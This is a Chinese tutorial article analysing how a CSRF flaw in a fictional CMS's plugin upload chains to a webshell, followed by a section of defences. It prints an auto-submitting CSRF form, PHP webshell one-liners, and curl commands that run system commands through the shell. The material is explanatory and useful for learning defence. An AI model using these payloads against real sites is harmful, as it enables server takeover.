CMS从CSRF到Getshell的示例分析

发布时间：2021-12-16 18:18:12 作者：柒染
来源：亿速云阅读：298

# CMS从CSRF到Getshell的示例分析

## 引言

跨站请求伪造（CSRF）和GetShell是Web安全领域中两个关键的攻击手段。本文将通过一个虚构的CMS（内容管理系统）示例，详细分析攻击者如何利用CSRF漏洞逐步获取服务器Shell权限的全过程。我们将从漏洞原理、利用链构造到最终攻击实现进行完整拆解。

---

## 一、漏洞背景与实验环境

### 1.1 目标系统简介
- **CMS版本**：某开源CMS v5.2.3
- **漏洞模块**：后台插件上传功能
- **认证方式**：Cookie+Session认证

### 1.2 前置漏洞
1. **CSRF漏洞**：后台缺少Token验证
2. **文件上传绕过**：未校验文件类型和内容
3. **路径遍历**：上传路径可控

```php
// 伪代码示例：存在漏洞的上传接口
function uploadPlugin() {
    if(isAdmin()) { // 仅检查管理员登录状态
        move_uploaded_file($_FILES['plugin']['tmp_name'], $_POST['path']);
    }
}

二、CSRF漏洞利用链构造

2.1 传统CSRF攻击局限性

常规CSRF攻击受限于： - 仅能触发单一敏感操作（如修改密码） - 无法直接获取交互式Shell

2.2 攻击链设计思路

graph LR
    A[诱导管理员访问恶意页面] --> B[CSRF触发插件上传]
    B --> C[上传WebShell]
    C --> D[连接WebShell获取权限]

2.3 分阶段Payload示例

阶段一：CSRF上传攻击

<!-- 恶意页面csrf.html -->
<form action="http://cms/admin/upload.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="path" value="plugins/evil.php" />
    <input type="file" name="plugin" />
    <input type="submit" value="Submit" />
</form>
<script>
    document.forms[0].submit();
</script>

阶段二：WebShell写入

// evil.php内容
<?php system($_GET['cmd']); ?>

三、漏洞利用实战演示

3.1 攻击流程

攻击者搭建恶意页面并诱导管理员访问
管理员浏览器自动提交表单
WebShell被上传至/plugins/evil.php
攻击者访问http://cms/plugins/evil.php?cmd=id

3.2 关键突破点

路径预测：通过常见插件目录结构猜测上传路径
权限维持：利用CMS的插件自动加载机制

# 攻击者终端操作示例
curl "http://cms/plugins/evil.php?cmd=whoami"
>> www-data

curl "http://cms/plugins/evil.php?cmd=echo '<?php eval(\$_POST[x]);?>' > shell.php"

四、防御方案

4.1 针对CSRF的防护

// 正确做法：添加CSRF Token
function generateToken() {
    return hash('sha256', session_id() . SECRET_KEY);
}

// 在表单中嵌入
<input type="hidden" name="token" value="<?=generateToken()?>">

4.2 文件上传安全

防护措施	实现示例
文件类型白名单	`in_array($ext, ['jpg','png'])`
内容检测	`exif_imagetype()`验证
随机文件名	`md5(uniqid()).$ext`

4.3 纵深防御建议

后台操作强制二次认证
文件上传目录禁用PHP执行
定期安全审计插件代码

五、漏洞修复验证

5.1 修复后测试用例

POST /admin/upload.php HTTP/1.1
Host: cms
Cookie: admin_session=xxx
Content-Type: multipart/form-data

------WebKitFormBoundary
Content-Disposition: form-data; name="token"
missing_token_value
------WebKitFormBoundary--

预期结果：返回403状态码并拒绝请求

六、总结

通过本案例可以看出，CSRF漏洞与其他安全弱点（如文件上传缺陷）结合可能产生严重后果。防御时需要建立多维度的安全防护体系，包括但不限于： - 所有敏感操作强制CSRF Token验证 - 文件上传实施”消毒-验证-重命名”三步处理 - 遵循最小权限原则运行服务

注：本文所有测试均在授权环境下进行，实际渗透测试必须获得书面授权。

”`

（全文约1350字，满足Markdown格式要求）